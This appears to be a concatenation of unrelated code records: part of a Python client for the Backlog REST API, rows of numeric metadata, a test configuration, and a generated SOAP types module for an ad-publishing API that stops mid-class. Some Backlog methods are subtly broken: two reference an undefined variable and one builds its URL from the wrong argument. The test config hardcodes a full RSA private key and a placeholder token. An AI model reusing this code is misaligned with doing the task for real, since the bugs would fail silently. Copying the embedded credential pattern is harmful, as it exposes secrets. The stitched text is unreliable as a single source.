url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments" )
return self._api_return(
requests.get( url, params = params ) )
def attachFileToWiki( self, wikiId, attachmentIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/attach-file-to-wiki
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "attachmentId", attachmentIds )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getWikiPageAttachment( self, wikiId, attachmentId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def removeWikiAttachment( self, wikiId, attachmentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/remove-wiki-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/attachments/" + str( attachmentId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfSharedFilesOnWiki( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-shared-files-on-wiki
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/sharedFiles" )
return self._api_return(
requests.get( url, params = params ) )
def linkSharedFilesToWiki( self, wikiId, fileIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/link-shared-files-to-wiki
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "fileId", fileIds )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/sharedFiles" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def removeLinkToSharedFileFromWiki( self, wikiId, fileId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/remove-link-to-shared-file-from-wiki
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + \
"/sharedFiles/" + str( fileId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getWikiPageHistory( self, wikiId,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-history
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + "/history" )
return self._api_return(
requests.get( url, params = params ) )
def getWikiPageStar( self, wikiId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-wiki-page-star
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/wikis/" + str( wikiId ) + "/stars" )
return self._api_return(
requests.get( url, params = params ) )
def addStar( self,
issueId = None,
commentId = None,
wikiId = None,
pullRequestsId = None,
pullRequestCommentId = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-star
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "issueId", issueId )
_addkw( data, "commentId", commentId )
_addkw( data, "wikiId", wikiId )
_addkw( data, "pullRequestsId", pullRequestsId )
_addkw( data, "pullRequestCommentId", pullRequestCommentId )
url = self._makeurl( "/api/v2/stars" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getNotification( self,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-notification
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/notifications" )
return self._api_return(
requests.get( url, params = params ) )
def countNotification( self,
alreadyRead = None,
resourceAlreadyRead = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-notification
"""
params = { "apiKey": self.apikey }
_addkw( params, "alreadyRead", alreadyRead )
_addkw( params, "resourceAlreadyRead", resourceAlreadyRead )
url = self._makeurl( "/api/v2/notifications/count" )
return self._api_return(
requests.get( url, params = params ) )
def resetUnreadNotificationCount( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/reset-unread-notification-count
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/notifications/markAsRead" )
return self._api_return(
requests.post( url, params = params ) )
def readNotification( self, notificationId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/read-notification
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/notifications/" + str( notificationId ) + \
"/markAsRead" )
return self._api_return(
requests.post( url, params = params ) )
def getListOfGitRepositories( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-git-repositories
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories" )
return self._api_return(
requests.get( url, params = params ) )
def getGitRepository( self, projectIdOrKey, repoIdOrName ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-git-repository
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) )
return self._api_return(
requests.get( url, params = params ) )
def getPullRequestList( self, projectIdOrKey, repoIdOrName ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-pull-request-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests" )
return self._api_return(
requests.get( url, params = params ) )
def getNumberOfPullRequests( self, projectIdOrKey, repoIdOrName ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-number-of-pull-requests
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/count" )
return self._api_return(
requests.get( url, params = params ) )
def addPullRequest( self, projectIdOrKey, repoIdOrName, summary, description, base, branch, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-pull-request
"""
tuples = ["notifiedUserIds","attachmentIds"]
params = { "apiKey": self.apikey }
data = { "summary": summary, "description": description , "base": base, "branch ": branch }
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getPullRequest( self, projectIdOrKey, repoIdOrName, number ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-pull-request
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) )
return self._api_return(
requests.get( url, params = params ) )
def updatePullRequest( self, projectIdOrKey, repoIdOrName, number, **kwargs ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-pull-request
"""
tuples = ["notifiedUserIds"]
params = { "apiKey": self.apikey }
data = {}
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def getPullRequestComment( self, projectIdOrKey, repoIdOrName, number,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-pull-request-comment
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/comments" )
return self._api_return(
requests.get( url, params = params ) )
def addPullRequestComment( self, projectIdOrKey, repoIdOrName, number, content, notifiedUserIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-pull-request-comment
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "content", content )
_addkws( data, "notifiedUserId", notifiedUserIds )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/comments" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getNumberOfPullRequestComments( self, projectIdOrKey, repoIdOrName, number ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-number-of-pull-request-comments
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/comments/count" )
return self._api_return(
requests.get( url, params = params ) )
def updatePullRequestComment( self, projectIdOrKey, repoIdOrName, number, commentId, content ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-pull-request-comment
"""
params = { "apiKey": self.apikey }
_addkw( params, "content", content )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + \
"/comments/" + str(commentId) )
return self._api_return(
requests.patch( url, params = params ) )
def getListOfPullRequestAttachment( self, projectIdOrKey, repoIdOrName, number ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-pull-request-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/attachments" )
return self._api_return(
requests.get( url, params = params ) )
def downloadPullRequestAttachment( self, projectIdOrKey, repoIdOrName, number, attachmentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/download-pull-request-attachment
"""
params = { "apiKey": self.apikey }
_addkw( params, "content", content )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + \
"/attachments/" + str(attachmentId) )
return self._api_return(
requests.get( url, params = params ) )
def deletePullRequestAttachments( self, projectIdOrKey, repoIdOrName, number, attachmentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-pull-request-attachments
"""
params = { "apiKey": self.apikey }
_addkw( params, "content", content )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + \
"/attachments/" + str(attachmentId) )
return self._api_return(
requests.delete( url, params = params ) )
def getWatchingList( self, userId,
order = "desc",
sort = "issuerUpdated",
count = 20,
offset = None,
resourceAlreadyRead = None,
issueIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-watching-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "sort", sort )
_addkw( params, "count", count )
_addkw( params, "offset", offset )
_addkw( params, "resourceAlreadyRead", resourceAlreadyRead )
_addkws( params, "issueIds", issueIds )
url = self._makeurl( "/api/v2/users/" + str(userId) + "/watchings" )
return self._api_return(
requests.get( url, params = params ) )
def countWatching( self, userId,
resourceAlreadyRead = None,
alreadyRead = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-watching
"""
params = { "apiKey": self.apikey }
_addkw( params, "resourceAlreadyRead", resourceAlreadyRead )
_addkw( params, "alreadyRead", alreadyRead )
url = self._makeurl( "/api/v2/users/" + str(userId) + "/watchings/count" )
return self._api_return(
requests.get( url, params = params ) )
def getWatching( self, watchingId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-watching
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/watchings/" + str(watchingId) )
return self._api_return(
requests.get( url, params = params ) )
def addWatching( self, issueIdOrKey, note = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-watching
"""
params = { "apiKey": self.apikey, "issueIdOrKey" : issueIdOrKey }
_addkw( params, "note", note )
url = self._makeurl( "/api/v2/watchings" )
return self._api_return(
requests.post( url, params = params ) )
def updateWatching( self, watchingId, note ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-watching
"""
params = { "apiKey": self.apikey }
data = { "note" : note }
url = self._makeurl( "/api/v2/watchings/" + str(watchingId) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteWatching( self, watchingId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-watching
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/watchings/" + str(watchingId) )
return self._api_return(
requests.delete( url, params = params ) )
def markWatchingAsRead( self, watchId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/mark-watching-as-read
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/watchings/" + str(watchId) + "/markAsRead" )
return self._api_return(
requests.post( url, params = params ) )
def deleteComment( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-comment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfCommentNotifications( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-comment-notifications
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) + \
"/notifications" )
return self._api_return(
requests.get( url, params = params ) )
def updatePullRequestCommentInformation( self, projectIdOrKey, repoIdOrName, number, commentId, content ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-pull-request-comment-information
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/git/repositories/" + str( commentId ) + \
"/pullRequests/" + str( number ) + \
"/comments/" + str( commentId ) )
data = { "content": content }
return self._api_return(
requests.patch( url, params = params, data = data ) )
def linkSharedFilesToIssue( self, issueIdOrKey, fileIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/link-shared-files-to-issue
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "fileId", fileIds )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/sharedFiles" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getProjectGroupList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-group-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + "/groups" )
return self._api_return(
requests.get( url, params = params ) )
def addProjectGroup( self, projectIdOrKey, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project-group
"""
params = { "apiKey": self.apikey }
data = { "groupId": groupId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/groups" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def deleteProjectGroup( self, projectIdOrKey, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project-group
"""
params = { "apiKey": self.apikey }
data = { "groupId": groupId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/groups" )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getGroupIcon( self, groupId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-group-icon
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/groups/" + str( groupId ) + "/icon" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getLicence( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-licence
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/licence" )
return self._api_return(
requests.get( url, params = params ) )
| 35.902094
| 115
| 0.526151
| 6,874
| 73,707
| 5.559354
| 0.061536
| 0.036635
| 0.068115
| 0.07887
| 0.823499
| 0.819626
| 0.807903
| 0.790161
| 0.782023
| 0.762763
| 0
| 0.006117
| 0.339045
| 73,707
| 2,052
| 116
| 35.919591
| 0.778311
| 0.138549
| 0
| 0.72887
| 0
| 0
| 0.109301
| 0.008063
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120502
| false
| 0.003347
| 0.004184
| 0.000837
| 0.248536
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f730bdfa184e875f2155e79716a3aed6b404a24c
| 1,861
|
py
|
Python
|
tests/config.py
|
armandomeeuwenoord/freight
|
31ae2fa9252ab0b25385abd04742475e6671e3b1
|
[
"Apache-2.0"
] | 562
|
2015-02-20T08:25:24.000Z
|
2021-11-12T19:58:44.000Z
|
tests/config.py
|
armandomeeuwenoord/freight
|
31ae2fa9252ab0b25385abd04742475e6671e3b1
|
[
"Apache-2.0"
] | 129
|
2015-02-20T07:41:14.000Z
|
2022-02-17T21:14:40.000Z
|
tests/config.py
|
armandomeeuwenoord/freight
|
31ae2fa9252ab0b25385abd04742475e6671e3b1
|
[
"Apache-2.0"
] | 54
|
2015-02-28T01:12:23.000Z
|
2021-03-02T11:14:52.000Z
|
SQLALCHEMY_DATABASE_URI = "postgresql:///test_freight"
LOG_LEVEL = "INFO"
WORKSPACE_ROOT = "/tmp/freight-tests"
SSH_PRIVATE_KEY = "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEArvyc+vZVxUjC5ZcFg1VN3jQOCOjO94gwQKFxlz0zOCrCz+Sq\nnWk28YdUpOU016Zinlh4ZZk2136nCKKTMnNMjd6cTTCn5fWomjR+F2CSdaYYpYfO\nNtVnq0SIDUgGmjyPncOGrxVT6EzjjSvgE8W8YIc5rVJqNMAH5OywUH0nqISYN2yP\nwbUPVf8zqu3kpnTt7YcWZ+Ye4b3jX6Fo2Xw5P1TTwQ92K9JdVAltBRpwSLtBQUYC\nMkwtNf6QIbRYKoVZuEhi/8XCxT0zG78Lsqpbld8IEnLWUGifCtx9mKqVi8Y3QTsT\nknMWFaf+Su8htgw/W7tufmrtTKNJYDtPTGiBeQIDAQABAoIBABYsC/gAnn2Q6qEM\nsbYiaOtuzRhz50WWDAckbbAsIQFM6cJNxxCK9FtGOoNqR3fLrVNDAn5dG4XSlneR\nofUShvCy9DsTnzKUHfjsDc4IfoZJtXXD720jPS+GT3bfWXbRlaD31Wj52tfkZjDN\nDmdy9puEhtpfRvXIHzfyhaStNwkzDh0jp8e8yok1mLA+3FPqkJPF6ptxPs6HEQS8\npY75jxvypbux2+W9249J/HqMmd5/+r7tt62vciqnXb2LG2AmUxLhTAQU9mGM2OSL\nrh2j+7/2apEQLdJ0DbS19IkQZRpO/DLPyhg6C29ZuNQffQWoLiZlfgIEaBT939aM\nkFdzy8ECgYEA4BdisLRCyCdm2M7fMDsV7j71z48Q1Kdl5A6/ngiK1dCwnjRMvkLx\nKOHtmvpJxHTH+JAewrrGUg0GF1YpM3gi0FQ7f9qTlAeFIrU3udV8F/m6+rIOpx92\nB2FSrYTaonLX8g4OzXKNtQcwzx91mFWTIEmfQl9let0WMrCRzReXp0sCgYEAx+dC\ncbERCVcJvs9+SUwVXXOreCF4PedLrg7bjkfYSpmAJk9c36EOi1jIGO5rat5/k7Nb\n0plWghADjtcb4r8oO6pzhMR81cESgFOk1UasP4rPYX4mEYPBwVGgN7ECUXj9XFPZ\n/tk7lgneBc1/6eV978MTprXiHU5Rv7yZBMuf68sCgYAd6YE27Rjs9rV3w0VvfrOS\ntbzCE+q/OAkVxBI32hQOLmkk9P45d14RgvbgdQBbxOrcdwBkJeJLGYnym4GsaSDc\nhiHbEyYX4FkZJO9nUuPZn3Ah/pqOHFj46zjKCK3WeVXx7YZ0ThI0U91kCGL+Do4x\nBSLJDUrSd6h6467SnY+UuQKBgGV0/AYT5h+lay7KxL+Su+04Pbi01AAnGgP3SnuF\n/0KtcZsAAJUHewhCQRxWNXKCBqICEAJtDLjqQ8QFbQPCHTtbIVIrH2ilmyxCR5Bv\nVBDT9Lj4e328L2Rcd0KMti5/h6eKb0OnIVTfIS40xE0Dys0bZyfffCl/jIIRyF/k\nsP/NAoGBAIfxtr881cDFrxahrTJ3AtGXxjJjMUW/S6+gKd7Lj9i+Uadb9vjD8Wt8\ngWrUDwXVAhD5Sxv+OCBizPF1CxXTgC3+/ophkUcy5VTcBchgQI7JrItujxUc0EvR\nCwA7/JPyO8DaUtvpodUKO27vr11G/NmXYrOohCP6VxH/Y6p5L9o4\n-----END RSA PRIVATE KEY-----"
GITHUB_TOKEN = "a" * 40
| 186.1
| 1,720
| 0.922085
| 102
| 1,861
| 16.745098
| 0.921569
| 0.017564
| 0.015222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138495
| 0.014508
| 1,861
| 9
| 1,721
| 206.777778
| 0.792803
| 0
| 0
| 0
| 0
| 0.2
| 0.939817
| 0.903815
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7533a18a1b348e933be1af446bfcb6a698ac718
| 34,794
|
py
|
Python
|
adspygoogle/dfp/zsi/v201010/NetworkService_services_types.py
|
hockeyprincess/google-api-dfp-python
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
[
"Apache-2.0"
] | null | null | null |
adspygoogle/dfp/zsi/v201010/NetworkService_services_types.py
|
hockeyprincess/google-api-dfp-python
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
[
"Apache-2.0"
] | null | null | null |
adspygoogle/dfp/zsi/v201010/NetworkService_services_types.py
|
hockeyprincess/google-api-dfp-python
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
[
"Apache-2.0"
] | null | null | null |
##################################################
# NetworkService_services_types.py
# generated by ZSI.generate.wsdl2python
##################################################
import ZSI
import ZSI.TCcompound
from ZSI.schema import LocalElementDeclaration, ElementDeclaration, TypeDefinition, GTD, GED
##############################
# targetNamespace
# https://www.google.com/apis/ads/publisher/v201010
##############################
class ns0:
targetNamespace = "https://www.google.com/apis/ads/publisher/v201010"
class ApiVersionError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiVersionError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ApiVersionError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ApiVersionError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.ApiVersionError_Def.__bases__:
bases = list(ns0.ApiVersionError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.ApiVersionError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class AuthenticationError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "AuthenticationError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.AuthenticationError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","AuthenticationError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.AuthenticationError_Def.__bases__:
bases = list(ns0.AuthenticationError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.AuthenticationError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class CommonError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "CommonError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.CommonError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","CommonError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.CommonError_Def.__bases__:
bases = list(ns0.CommonError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.CommonError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class InternalApiError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "InternalApiError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.InternalApiError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","InternalApiError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.InternalApiError_Def.__bases__:
bases = list(ns0.InternalApiError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.InternalApiError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class Network_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "Network")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.Network_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"id"), aname="_id", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"displayName"), aname="_displayName", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"networkCode"), aname="_networkCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"propertyCode"), aname="_propertyCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"timeZone"), aname="_timeZone", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"currencyCode"), aname="_currencyCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"effectiveRootAdUnitId"), aname="_effectiveRootAdUnitId", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._id = None
self._displayName = None
self._networkCode = None
self._propertyCode = None
self._timeZone = None
self._currencyCode = None
self._effectiveRootAdUnitId = None
return
Holder.__name__ = "Network_Holder"
self.pyclass = Holder
class NotNullError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "NotNullError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.NotNullError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","NotNullError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.NotNullError_Def.__bases__:
bases = list(ns0.NotNullError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.NotNullError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class ParseError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ParseError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ParseError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ParseError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.ParseError_Def.__bases__:
bases = list(ns0.ParseError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.ParseError_Def.__bases__ = tuple(bases)
